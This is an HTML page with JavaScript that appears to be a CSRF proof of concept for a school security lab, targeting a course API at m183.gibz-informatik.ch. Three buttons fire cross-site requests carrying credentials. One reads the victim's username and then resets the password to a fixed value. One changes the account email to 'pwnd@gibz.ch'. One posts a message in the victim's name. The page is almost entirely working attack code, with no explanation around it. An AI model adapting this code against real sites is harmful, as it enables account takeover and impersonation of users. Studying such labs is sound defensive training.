<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
</head>
<body>
    <button onclick="ChangePassword()">Change Password</button>
    <button onclick="ChangeEmail()">Change E-Mail</button>
    <button onclick="CreateBlogPost()">Create Blog-Post</button>
</body>
</html>

<script>
    function ChangePassword()
    {
        fetch('https://m183.gibz-informatik.ch/api/csrf/getUsername', {
            method: 'get',
            credentials: 'include',
        })
        .then(function(response){
            return response.text()
        })
        .then(function(username){
            var formData = new FormData();
            formData.append("username", username)
            formData.append("password", "Pa$$w0rd")
            fetch('https://m183.gibz-informatik.ch/api/csrf/changePassword', {
                method: 'post',
                credentials: 'include',
                body: formData
            })
            .then(function(response){
                if(response.status === 204){
                    alert('Passowrd was changed.')
                }
            })
        })
    }

    function ChangeEmail()
    {
        fetch('https://m183.gibz-informatik.ch/api/csrf/changeEmail?email=pwnd@gibz.ch', {
            method: 'get',
            credentials: 'include'
        })
        .then(function(response){
            if(response.status === 204){
                alert('E-mail was changed.')
            }
        })
    }

    function CreateBlogPost()
    {
        formData = new FormData();
        formData.append("message", "I did not post this.")
        fetch('https://m183.gibz-informatik.ch/api/csrf/postMessage', {
            method: 'post',
            credentials: 'include',
            body: formData
        })
        .then(function(response){
            if(response.status === 204){
                alert('Message was posted.')
            }
        })
    }

</script>